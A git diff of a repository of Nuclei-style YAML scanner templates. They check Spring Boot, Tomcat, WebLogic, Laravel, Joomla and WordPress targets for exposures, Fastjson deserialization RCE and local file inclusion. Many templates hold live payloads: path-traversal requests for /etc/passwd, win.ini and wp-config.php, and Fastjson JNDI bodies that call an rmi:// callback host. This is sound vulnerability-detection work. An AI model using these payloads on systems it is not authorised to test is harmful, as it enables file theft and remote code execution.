matchers-condition: and matchers: @@ -26,7 +21,6 @@ http: - '"threads":' - '"threadName":' condition: and - - type: word part: header words: @@ -35,7 +29,6 @@ http: - "application/vnd.spring-boot.actuator.v2+json" - "application/vnd.spring-boot.actuator.v1+json" condition: or - - type: status status: - 200 diff --git a/poc/java/springboot-trace-10492.yaml b/poc/java/springboot-trace-10492.yaml index 31cf2cb63e..b967e514f2 100644 --- a/poc/java/springboot-trace-10492.yaml +++ b/poc/java/springboot-trace-10492.yaml @@ -1,19 +1,14 @@ id: springboot-trace - info: name: Detect Springboot Trace Actuator author: that_juan_,dwisiswant0,wdahlenb severity: low description: View recent HTTP requests and responses tags: misconfig,springboot,exposure - metadata: - max-request: 1 - -http: +requests: - method: GET path: - "{{BaseURL}}/trace" - matchers-condition: and matchers: - type: word @@ -24,7 +19,6 @@ http: - '"method"' - '"path"' condition: and - - type: word part: header words: @@ -32,7 +26,6 @@ http: - "application/vnd.spring-boot.actuator" - "application/vnd.spring-boot.actuator.v1+json" condition: or - - type: status status: - 200 diff --git a/poc/java/tomcat-default-login.yaml b/poc/java/tomcat-default-login.yaml index 071367c987..4e522c9229 100644 --- a/poc/java/tomcat-default-login.yaml +++ b/poc/java/tomcat-default-login.yaml @@ -2,8 +2,8 @@ id: tomcat-default-login info: name: ApahceTomcat Manager Default Login author: pdteam - description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations. severity: high + description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations. reference: - https://www.rapid7.com/db/vulnerabilities/apache-tomcat-default-ovwebusr-password/ tags: tomcat,apache,default-login @@ -55,11 +55,15 @@ requests: attack: pitchfork # Available options: sniper, pitchfork and clusterbomb matchers-condition: and matchers: + - type: word + part: body + words: + - "Apache Tomcat" + - "Server Information" + - "Hostname" + condition: and - type: status status: - 200 - - type: word - words: - - Apache Tomcat # Enhanced by mp on 2022/03/03 diff --git a/poc/java/tomcat-scripts-10802.yaml b/poc/java/tomcat-scripts-10802.yaml index 16226c2852..268fc0b6a8 100644 --- a/poc/java/tomcat-scripts-10802.yaml +++ b/poc/java/tomcat-scripts-10802.yaml @@ -1,11 +1,9 @@ id: tomcat-scripts - info: name: Detect Tomcat Exposed Scripts author: Co0nan severity: info tags: apache - requests: - method: GET path: diff --git a/poc/java/weblogic-detect-11144.yaml b/poc/java/weblogic-detect-11144.yaml index 23f46a01a8..d50d670388 100644 --- a/poc/java/weblogic-detect-11144.yaml +++ b/poc/java/weblogic-detect-11144.yaml @@ -1,22 +1,13 @@ id: weblogic-detect info: name: Detect Weblogic - author: pdteam + author: bing0o severity: info - tags: tech,weblogic - metadata: - shodan-query: product:"Oracle Weblogic" requests: - method: GET path: - - "{{BaseURL}}/{{randstr}}" - matchers-condition: and + - "{{BaseURL}}/console/login/LoginForm.jsp" matchers: - type: word words: - - "From RFC 2068" - - "Error 404--Not Found" - condition: and - - type: status - status: - - 404 + - "WebLogic" diff --git a/poc/javascript/Arcms-json_newslist-sqli.yaml b/poc/javascript/Arcms-json_newslist-sqli.yaml old mode 100755 new mode 100644 diff --git a/poc/javascript/BlueCMS_v1-adjs-sqli.yaml b/poc/javascript/BlueCMS_v1-adjs-sqli.yaml old mode 100755 new mode 100644 diff --git a/poc/javascript/aem-querybuilder-json-servlet-187.yaml b/poc/javascript/aem-querybuilder-json-servlet-187.yaml index 18210457c8..48870c0894 100644 --- a/poc/javascript/aem-querybuilder-json-servlet-187.yaml +++ b/poc/javascript/aem-querybuilder-json-servlet-187.yaml @@ -18,11 +18,6 @@ requests: status: - 200 - - type: word - words: - - "application/json" - part: header - - type: word words: - 'success' diff --git a/poc/javascript/bower-json.yaml b/poc/javascript/bower-json.yaml index 67f8c44101..8d59c7f9bb 100644 --- a/poc/javascript/bower-json.yaml +++ b/poc/javascript/bower-json.yaml @@ -4,7 +4,7 @@ info: name: bower.json file disclosure author: oppsec severity: info - description: Bower is a package manager which stores packages informations in bower.json file + description: Bower is a package manager which stores package information in the bower.json file tags: exposure requests: diff --git a/poc/javascript/fastjson-1-2-42-rce-7408.yaml b/poc/javascript/fastjson-1-2-42-rce-7408.yaml index 6067f012d4..c50092689f 100644 --- a/poc/javascript/fastjson-1-2-42-rce-7408.yaml +++ b/poc/javascript/fastjson-1-2-42-rce-7408.yaml @@ -1,16 +1,11 @@ id: fastjson-1-2-42-rce info: - name: Fastjson 1.2.42 - Remote Code Execution + name: Fastjson 1.2.42 Deserialization RCE author: zh severity: critical - description: Fastjson 1.2.42 is susceptible to a deserialization remote code execution vulnerability reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 tags: fastjson,rce,deserialization,oast requests: - raw: @@ -34,5 +29,3 @@ requests: negative: true status: - 200 - -# Enhanced by mp on 2022/05/25 diff --git a/poc/javascript/fastjson-1-2-47-rce.yaml b/poc/javascript/fastjson-1-2-47-rce.yaml index 2971ba72ad..0d9f24a329 100644 --- a/poc/javascript/fastjson-1-2-47-rce.yaml +++ b/poc/javascript/fastjson-1-2-47-rce.yaml @@ -1,18 +1,13 @@ id: fastjson-1-2-47-rce info: - name: Fastjson 1.2.47 - Remote Code Execution + name: Fastjson 1.2.47 Deserialization RCE author: zh severity: critical - description: Fastjson 1.2.47 is susceptible to a deserialization remote code execution vulnerability. reference: - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce - https://www.freebuf.com/vuls/208339.html - https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955 - https://github.com/wyzxxz/fastjson_rce_tool - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 tags: fastjson,rce,deserialization,oast requests: - raw: @@ -43,5 +38,3 @@ requests: words: - "Bad Request" - "400" - -# Enhanced by mp on 2022/05/25 diff --git a/poc/javascript/fastjson-1-2-62-rce.yaml b/poc/javascript/fastjson-1-2-62-rce.yaml index 0b08215cde..7f16ccb998 100644 --- a/poc/javascript/fastjson-1-2-62-rce.yaml +++ b/poc/javascript/fastjson-1-2-62-rce.yaml @@ -1,17 +1,14 @@ id: fastjson-1-2-62-rce + info: - name: Fastjson 1.2.62 - Remote Code Execution + name: Fastjson 1.2.62 Deserialization RCE author: zh severity: critical - description: Fastjson 1.2.62 is susceptible to a deserialization remote code execution vulnerability. reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 tags: fastjson,rce,deserialization,oast + requests: - raw: - | @@ -23,15 +20,15 @@ requests: "@type":"org.apache.xbean.propertyeditor.JndiConverter", "AsText":"rmi://{{interactsh-url}}/exploit" } + matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms DNS Interaction + part: interactsh_protocol # Confirms DNS Interaction words: - "dns" + - type: status negative: true status: - - 200 - -# Enhanced by mp on 2022/05/25 + - 200 \ No newline at end of file diff --git a/poc/javascript/fastjson-1-2-67-rce-7424.yaml b/poc/javascript/fastjson-1-2-67-rce-7424.yaml index 9798de3adc..49fa7d3d12 100644 --- a/poc/javascript/fastjson-1-2-67-rce-7424.yaml +++ b/poc/javascript/fastjson-1-2-67-rce-7424.yaml @@ -1,22 +1,13 @@ id: fastjson-1-2-67-rce - info: - name: Fastjson 1.2.67 - Remote Code Execution + name: Fastjson 1.2.67 Deserialization RCE author: zh severity: critical - description: Fastjson 1.2.67 is susceptible to a remote code execution vulnerability. reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 tags: fastjson,rce,deserialization,oast - metadata: - max-request: 1 - -http: +requests: - raw: - | POST / HTTP/1.1 @@ -30,17 +21,13 @@ http: "UserTransaction":"rmi://{{interactsh-url}}/Exploit" } } - matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms DNS Interaction + part: interactsh_protocol # Confirms DNS Interaction words: - "dns" - - type: status negative: true status: - 200 - -# Enhanced by mp on 2022/05/25 diff --git a/poc/javascript/fastjson1_2_47-rce-Deserialization.yaml b/poc/javascript/fastjson1_2_47-rce-Deserialization.yaml old mode 100755 new mode 100644 diff --git a/poc/javascript/js-version-jszip_3-1-3.yaml b/poc/javascript/js-version-jszip_3-1-3.yaml index c4cc7f44c5..ec962b6a01 100644 --- a/poc/javascript/js-version-jszip_3-1-3.yaml +++ b/poc/javascript/js-version-jszip_3-1-3.yaml @@ -17,7 +17,7 @@ info: - https://cwe.mitre.org/data/definitions/400.html - https://cwe.mitre.org/data/definitions/29.html - https://www.owasp.org/index.php/Fingerprint_Web_Server_(OTG-INFO-002) - tags: js,jszip,outdated,version + tags: js,jszip,outdated,version,howden,snykroweb classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L cvss-score: 7.3 diff --git a/poc/javascript/keycloak-json-8472.yaml b/poc/javascript/keycloak-json-8472.yaml index 20e0016894..6ab0d7f9bc 100644 --- a/poc/javascript/keycloak-json-8472.yaml +++ b/poc/javascript/keycloak-json-8472.yaml @@ -1,13 +1,18 @@ id: keycloak-json + info: - name: Keycloak Json File + name: Keycloak JSON File author: oppsec severity: info - tags: exposure -requests: + metadata: + max-request: 1 + tags: exposure,keycloak,config,files + +http: - method: GET path: - "{{BaseURL}}/keycloak.json" + matchers-condition: and matchers: - type: word @@ -16,6 +21,9 @@ requests: - resource - auth-server-url condition: and + - type: status status: - 200 + +# digest: 4b0a004830460221009acc353a326ecb9df8fae0ac2780849233f7b1bca07d6b306abbcaa25e8936e4022100e4b00ec3576fa8492000c405ad847e18296b91f3d3c6bec750fa928b434a18e7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/javascript/package-json-9421.yaml b/poc/javascript/package-json-9421.yaml index c397c41544..d2b07ab133 100644 --- a/poc/javascript/package-json-9421.yaml +++ b/poc/javascript/package-json-9421.yaml @@ -1,18 +1,15 @@ id: package-json - info: name: npm package.json disclosure - author: geeknik,afaq + author: geeknik & afaq severity: info description: All npm packages contain a file, usually in the project root, called package.json - this file holds various metadata relevant to the project. tags: config,exposure - requests: - method: GET path: - "{{BaseURL}}/package.json" - "{{BaseURL}}/package-lock.json" - matchers-condition: and matchers: - type: word @@ -20,12 +17,10 @@ requests: - "name" - "version" condition: and - - type: word words: - "application/json" part: header - - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/poc/jenkins/jenkins-detect.yaml b/poc/jenkins/jenkins-detect.yaml index 136d39862b..2991584dd5 100644 --- a/poc/jenkins/jenkins-detect.yaml +++ b/poc/jenkins/jenkins-detect.yaml @@ -1,5 +1,4 @@ id: jenkins-detect - info: name: Jenkins Detection author: philippdelteil,daffainfo,c-sh0 @@ -11,13 +10,11 @@ info: metadata: shodan-query: http.favicon.hash:81586312 tags: tech,jenkins - requests: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/whoAmI/" - redirects: true max-redirects: 2 stop-at-first-match: true @@ -28,11 +25,9 @@ requests: words: - "x-jenkins" case-insensitive: true - - type: word words: - "Jenkins" - extractors: - type: kval kval: diff --git a/poc/joomla/joomla-config-file.yaml b/poc/joomla/joomla-config-file.yaml index 04f75c426a..ce01415e5f 100644 --- a/poc/joomla/joomla-config-file.yaml +++ b/poc/joomla/joomla-config-file.yaml @@ -1,11 +1,11 @@ id: joomla-config-dist-file info: - name: Joomla Config Dist File + name: Joomla! Config Dist File author: oppsec severity: low - description: configuration.php-dist is a file created by Joomla to save Joomla settings. - tags: config,exposure + description: configuration.php-dist is a file created by Joomla! to save Joomla settings. + tags: config,exposure,joomla requests: - method: GET diff --git a/poc/joomla/joomla-htaccess.yaml b/poc/joomla/joomla-htaccess.yaml index bf51cbfa49..a6ae5ce2b4 100644 --- a/poc/joomla/joomla-htaccess.yaml +++ b/poc/joomla/joomla-htaccess.yaml @@ -3,8 +3,8 @@ info: name: Joomla htaccess file disclosure author: oppsec severity: info - description: Joomla has an htaccess file to store configurations about HTTP config, directory listing, etc. - tags: misc,joomla + description: Joomla have a htaccess file to store some configuration about HTTP Config, Directory Listening etc... + tags: misc requests: - method: GET path: @@ -13,13 +13,13 @@ requests: matchers: - type: word words: - - "Joomla" + - "# @package Joomla" - "Open Source Matters. All rights reserved" condition: and - type: word - part: header words: - "text/plain" + part: header - type: status status: - 200 diff --git a/poc/kafka/kafka-consumer-monitor-8424.yaml b/poc/kafka/kafka-consumer-monitor-8424.yaml index 001c1d2f44..f038415448 100644 --- a/poc/kafka/kafka-consumer-monitor-8424.yaml +++ b/poc/kafka/kafka-consumer-monitor-8424.yaml @@ -4,9 +4,9 @@ info: name: Kafka Consumer Offset Monitor Exposure author: dhiyaneshDK severity: low + tags: panel,kafka metadata: shodan-query: http.title:"Kafka Consumer Offset Monitor" - tags: panel,kafka requests: - method: GET diff --git a/poc/laravel/laravel-debug-enabled-8574.yaml b/poc/laravel/laravel-debug-enabled-8574.yaml index d9a0151104..3613dbd615 100644 --- a/poc/laravel/laravel-debug-enabled-8574.yaml +++ b/poc/laravel/laravel-debug-enabled-8574.yaml @@ -1,29 +1,19 @@ id: laravel-debug-enabled - info: name: Laravel Debug Enabled author: notsoevilweasel + description: Laravel with APP_DEBUG set to true prone to showing verbose errors. severity: medium - description: | - Laravel with APP_DEBUG set to true is prone to show verbose errors. - remediation: | - Disable Laravel's debug mode by setting APP_DEBUG to false. tags: debug,laravel,misconfig - metadata: - max-request: 1 - -http: +requests: - method: GET path: - "{{BaseURL}}/_ignition/health-check" - matchers-condition: and matchers: - type: word - part: body words: - can_execute_commands - - type: status status: - 200 diff --git a/poc/laravel/laravel-env-8583.yaml b/poc/laravel/laravel-env-8583.yaml index 07f2a0adc9..aed619de53 100644 --- a/poc/laravel/laravel-env-8583.yaml +++ b/poc/laravel/laravel-env-8583.yaml @@ -1,8 +1,10 @@ id: laravel-env info: name: Laravel .env file accessible - author: d3sca + author: pxmme1337 & dwisiswant0 & geeknik & emenalf severity: critical + description: Laravel uses the .env file to store sensitive information like database credentials and tokens. It should not be publicly accessible. + reference: https://laravel.com/docs/master/configuration#environment-configuration tags: config,exposure requests: - method: GET diff --git a/poc/laravel/laravel-log-file-8597.yaml b/poc/laravel/laravel-log-file-8597.yaml index 5fada34f9b..9e81996767 100644 --- a/poc/laravel/laravel-log-file-8597.yaml +++ b/poc/laravel/laravel-log-file-8597.yaml @@ -1,15 +1,18 @@ id: laravel-log-file + info: name: Laravel log file publicly accessible - author: sheikhrishad & geeknik + author: sheikhrishad,geeknik severity: high description: The log file of this Laravel web app might reveal details on the inner workings of the app, possibly even tokens, credentials or personal information. reference: https://laravel.com/docs/master/logging tags: laravel,logs,exposure + requests: - method: GET path: - "{{BaseURL}}/storage/logs/laravel.log" + matchers-condition: and matchers: - type: word diff --git a/poc/local_file_inclusion/Karel-ip-phone-lfi.yaml b/poc/local_file_inclusion/Karel-ip-phone-lfi.yaml index cf9a777485..d7f751d79f 100644 --- a/poc/local_file_inclusion/Karel-ip-phone-lfi.yaml +++ b/poc/local_file_inclusion/Karel-ip-phone-lfi.yaml @@ -1,12 +1,16 @@ id: karel-ip-phone-lfi info: - name: Karel IP Phone IP1211 Web Management Panel - Directory Traversal + name: Karel IP Phone IP1211 Web Management Panel - Local File Inclusion author: 0x_Akoko severity: high - description: A vulnerability in the Karel IP Phone IP1211 Web Management Panel allows remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter. + description: Karel IP Phone IP1211 Web Management Panel is vulnerable to local file inclusion and can allow remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter. reference: - https://cxsecurity.com/issue/WLB-2020100038 - https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 tags: karel,lfi requests: - method: GET @@ -22,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/08/03 diff --git a/poc/local_file_inclusion/bems-api-lfi.yaml b/poc/local_file_inclusion/bems-api-lfi.yaml index f81f84cfeb..ffddda6590 100644 --- a/poc/local_file_inclusion/bems-api-lfi.yaml +++ b/poc/local_file_inclusion/bems-api-lfi.yaml @@ -1,20 +1,24 @@ -id: bems-api-lfi -info: - name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download - author: gy741 - severity: high - description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php - tags: lfi -requests: - - method: GET - path: - - "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0" - - type: status - status: - - 200 +id: bems-api-lfi + +info: + name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download + author: gy741 + severity: high + description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php + tags: lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/poc/local_file_inclusion/blue-ocean-excellence-lfi-758.yaml b/poc/local_file_inclusion/blue-ocean-excellence-lfi-758.yaml index ea7b52af00..aaf580687c 100644 --- a/poc/local_file_inclusion/blue-ocean-excellence-lfi-758.yaml +++ b/poc/local_file_inclusion/blue-ocean-excellence-lfi-758.yaml @@ -3,8 +3,7 @@ info: name: Blue Ocean Excellence LFI author: pikpikcu severity: high - reference: - - https://blog.csdn.net/qq_41901122/article/details/116786883 + reference: https://blog.csdn.net/qq_41901122/article/details/116786883 tags: blue-ocean,lfi requests: - method: GET diff --git a/poc/local_file_inclusion/bullwark-momentum-lfi-808.yaml b/poc/local_file_inclusion/bullwark-momentum-lfi-808.yaml index eb6462cb09..2c607f3d82 100644 --- a/poc/local_file_inclusion/bullwark-momentum-lfi-808.yaml +++ b/poc/local_file_inclusion/bullwark-momentum-lfi-808.yaml @@ -1,5 +1,4 @@ id: bullwark-momentum-lfi - info: name: Bullwark Momentum Series JAWS 1.0 - Local File Inclusion author: pikpikcu @@ -13,26 +12,22 @@ info: cvss-score: 7.5 cwe-id: CWE-22 metadata: - max-request: 1 version: Bullwark Momentum Series Web Server JAWS/1.0 shodan-query: Bullwark fofa-query: "Bullwark" - tags: lfi,edb,bullwark - -http: + tags: bullwark,lfi +requests: - raw: - | GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} X-Requested-With: XMLHttpRequest Referer: {{Hostname}} - matchers-condition: and matchers: - type: status status: - 200 - - type: regex regex: - "root:.*:0:0:" diff --git a/poc/local_file_inclusion/bullwark-momentum-lfi.yaml b/poc/local_file_inclusion/bullwark-momentum-lfi.yaml index 2c607f3d82..2731888240 100644 --- a/poc/local_file_inclusion/bullwark-momentum-lfi.yaml +++ b/poc/local_file_inclusion/bullwark-momentum-lfi.yaml @@ -1,35 +1,32 @@ id: bullwark-momentum-lfi + info: - name: Bullwark Momentum Series JAWS 1.0 - Local File Inclusion + name: Bullwark Momentum Series JAWS 1.0 - Directory Traversal author: pikpikcu severity: high - description: Bullwark Momentum Series JAWS 1.0 is vulnerable to local file inclusion. - reference: - - https://www.exploit-db.com/exploits/47773 - - http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 # software link - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - metadata: - version: Bullwark Momentum Series Web Server JAWS/1.0 - shodan-query: Bullwark - fofa-query: "Bullwark" tags: bullwark,lfi + reference: https://www.exploit-db.com/exploits/47773 + +# Vendor Homepage: http://www.bullwark.net/ +# Version : Bullwark Momentum Series Web Server JAWS/1.0 +# Software Link : http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 +# Shodan Dork: https://www.shodan.io/search?query=Bullwark&page=1 +# fofa dork:-https://fofa.so/result?q=Bullwark&qbase64=QnVsbHdhcms%3D + requests: - raw: - | GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 X-Requested-With: XMLHttpRequest Referer: {{Hostname}} + matchers-condition: and matchers: - type: status status: - 200 - - type: regex - regex: - - "root:.*:0:0:" - -# Enhanced by mp on 2022/07/22 + - type: word + words: + - "root:" diff --git a/poc/local_file_inclusion/candidate-application-lfi-850.yaml b/poc/local_file_inclusion/candidate-application-lfi-850.yaml index cdc97aa53a..78c5990146 100644 --- a/poc/local_file_inclusion/candidate-application-lfi-850.yaml +++ b/poc/local_file_inclusion/candidate-application-lfi-850.yaml @@ -1,5 +1,4 @@ id: candidate-application-lfi - info: name: WordPress Candidate Application Form <= 1.3 - Local File Inclusion author: dhiyaneshDK @@ -12,18 +11,15 @@ info: cvss-score: 8.6 cwe-id: CWE-22 tags: wordpress,wp-plugin,lfi,wp - requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd' - matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 diff --git a/poc/local_file_inclusion/churchope-lfi-915.yaml b/poc/local_file_inclusion/churchope-lfi-915.yaml index 3acac45bb1..a0f1465b83 100644 --- a/poc/local_file_inclusion/churchope-lfi-915.yaml +++ b/poc/local_file_inclusion/churchope-lfi-915.yaml @@ -1,15 +1,21 @@ id: churchope-lfi + info: - name: ChurcHope Theme <= 2.1 - Local File Inclusion (LFI) + name: WordPress ChurcHope Theme <= 2.1 - Local File Inclusion author: dhiyaneshDK severity: high - description: The vulnerability is caused by improper filtration of user-supplied input passed via the 'file' HTTP GET parameter to the '/lib/downloadlink.php' script, which is publicly accessible. - reference: https://wpscan.com/vulnerability/3c5833bd-1fe0-4eba-97aa-7d3a0c8fda15 + description: WordPress ChurcHope Theme <= 2.1 is susceptible to local file inclusion. The vulnerability is caused by improper filtration of user-supplied input passed via the 'file' HTTP GET parameter to the '/lib/downloadlink.php' script, which is publicly accessible. + reference: + - https://wpscan.com/vulnerability/3c5833bd-1fe0-4eba-97aa-7d3a0c8fda15 + classification: + cwe-id: CWE-22 tags: wordpress,wp-theme,lfi,wp + requests: - method: GET path: - '{{BaseURL}}/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php' + matchers-condition: and matchers: - type: word @@ -18,6 +24,9 @@ requests: - "DB_NAME" - "DB_PASSWORD" condition: and + - type: status status: - 200 + +# Enhanced by mp on 2022/04/12 diff --git a/poc/local_file_inclusion/dicoogle-pacs-lfi-6995.yaml b/poc/local_file_inclusion/dicoogle-pacs-lfi-6995.yaml index d7e5ca13d2..8f38c36ece 100644 --- a/poc/local_file_inclusion/dicoogle-pacs-lfi-6995.yaml +++ b/poc/local_file_inclusion/dicoogle-pacs-lfi-6995.yaml @@ -1,4 +1,5 @@ id: dicoogle-pacs-lfi + info: name: Dicoogle PACS 2.5.0 - Directory Traversal author: 0x_akoko @@ -6,10 +7,12 @@ info: description: In version 2.5.0, it is vulnerable to local file inclusion. This allows an attacker to read arbitrary files that the web user has access to. Admin credentials aren't required. reference: https://cxsecurity.com/issue/WLB-2018070131 tags: windows,lfi,dicoogle + requests: - method: GET path: - "{{BaseURL}}/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini" + stop-at-first-match: true matchers: - type: word diff --git a/poc/local_file_inclusion/elfinder-version-7205.yaml b/poc/local_file_inclusion/elfinder-version-7205.yaml index 61068856c5..f4b7ed1614 100644 --- a/poc/local_file_inclusion/elfinder-version-7205.yaml +++ b/poc/local_file_inclusion/elfinder-version-7205.yaml @@ -1,17 +1,27 @@ id: elfinder-version + info: - name: elFinder version extractor + name: elFinder 2.1.58 - Remote Code Execution author: idealphase - severity: info - description: elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. The issues were patched in version 2.1.59. As a workaround, ensure the connector is not exposed without authentication. + severity: critical + description: elFinder 2.1.58 is vulnerable to remote code execution. This can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. + remediation: The issues were patched in version 2.1.59. As a workaround, ensure the connector is not exposed without authentication. reference: - https://github.com/Studio-42/elFinder/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cwe-id: CWE-77 + metadata: + max-request: 2 tags: tech,elfinder,oss -requests: + +http: - method: GET path: - "{{BaseURL}}/js/elfinder.min.js" - "{{BaseURL}}/js/elFinder.version.js" + matchers-condition: and matchers: - type: word @@ -20,12 +30,16 @@ requests: - "elFinder - file manager for web" - "elFinder.prototype.version =" condition: or + - type: status status: - 200 + extractors: - type: regex group: 1 regex: - '\* Version (.+) \(' - "elFinder.prototype.version = '([0-9.]+)';" + +# digest: 4a0a0047304502203fd42f01a45120d89be9dbccf02f4640a8984cb9e3354cfc80b84bd9e7f0b1c1022100b7a056d3efbf71d6eca1b3c8b3536b6bb31863d3092564f71ac5fadb59197072:922c64590222798bb761d5b6d8e72950 diff --git a/poc/local_file_inclusion/generic-linux-lfi.yaml b/poc/local_file_inclusion/generic-linux-lfi.yaml index cd0b3284c2..db8a2f11fa 100644 --- a/poc/local_file_inclusion/generic-linux-lfi.yaml +++ b/poc/local_file_inclusion/generic-linux-lfi.yaml @@ -1,62 +1,45 @@ id: generic-linux-lfi - info: name: Generic Linux - Local File Inclusion - author: 0x71rex + author: geeknik,unstabl3,pentest_swissky,sushantkamble,0xSmiley severity: high - description: Generic Linux is subject to local file Inclusion on searches for /etc/shells on passed URLs. - reference: https://github.com/imhunterand/ApachSAL/blob/main/assets/exploits.json + description: Generic Linux is subject to local file Inclusion on searches for /etc/passwd on passed URLs. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - metadata: - max-request: 32 tags: linux,lfi,generic - -http: +requests: - method: GET path: - - "{{BaseURL}}/etc/shells" - - "{{BaseURL}}/..%5cetc/shells" - - "{{BaseURL}}/..%5c..%5cetc/shells" - - "{{BaseURL}}/..%5c..%5c..%5cetc/shells" - - "{{BaseURL}}/..%5c..%5c..%5c..%5cetc/shells" - - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5cetc/shells" - - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5cetc/shells" - - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/shells" - - "{{BaseURL}}/static/..%5cetc/shells" - - "{{BaseURL}}/static/..%5c..%5cetc/shells" - - "{{BaseURL}}/static/..%5c..%5c..%5cetc/shells" - - "{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/shells" - - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5cetc/shells" - - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/shells" - - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/shells" - - "{{BaseURL}}/./../../../../../../../../../../etc/shells" - - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/shells" - - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/shells" - - "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/shells" - - "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/shells" - - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shells" - - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/shells" - - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/shells" - - "{{BaseURL}}/..///////..////..//////etc/shells" - - 